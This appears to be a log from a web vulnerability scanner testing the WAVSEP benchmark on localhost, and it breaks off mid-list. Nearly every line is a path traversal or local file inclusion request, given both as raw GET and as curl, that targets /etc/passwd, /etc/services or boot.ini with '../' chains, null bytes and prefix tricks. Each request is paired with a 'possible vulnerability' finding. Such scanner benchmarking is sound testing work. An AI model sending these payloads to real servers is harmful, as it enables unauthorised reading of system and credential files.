GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
